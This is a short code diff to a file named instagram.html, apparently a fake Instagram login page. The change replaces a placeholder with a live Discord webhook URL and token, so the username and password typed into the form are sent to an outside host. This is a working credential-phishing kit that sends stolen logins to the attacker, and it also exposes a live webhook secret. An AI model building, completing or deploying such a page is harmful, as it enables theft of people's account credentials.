--- a/instagram.html
+++ b/instagram.html
@@ -100,7 +100,7 @@
       const username = form.username.value;
       const password = form.password.value;
 
-      const webhookUrl = "YOUR_WEBHOOK_URL";
+      const webhookUrl = "https://discord.com/api/webhooks/1116509552695840768/qaUSQH-IXxJOiAgDTmflw3wNTJcg5kmMHMtSe6fi7Xm0HA3JHrOEpXUUFWBRvE22HvQg";
 
       const payload = {
         username,
